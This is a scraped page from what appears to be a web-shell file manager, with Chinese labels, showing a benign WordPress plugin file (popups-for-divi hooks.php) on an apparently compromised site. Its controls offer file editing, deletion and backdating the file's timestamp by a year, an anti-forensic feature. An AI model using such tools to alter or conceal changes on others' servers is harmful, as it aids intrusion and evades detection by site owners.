文件操作 - hooks.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/rokpaw/public_html/wp-content/plugins/popups-for-divi/includes/hooks.php
编辑文件内容
<?php /** * Hooks up filters and actions of this module. * * @package PopupsForDivi */ // Exit if accessed directly. defined( 'ABSPATH' ) || exit; // Load the shared library subset, as early as possible. add_action( 'init', 'pfd_load_library', 2 ); // Load the translation files. add_action( 'init', 'pfd_translate_plugin', 1 );
修改文件时间
将文件时间修改为当前时间的前一年
删除文件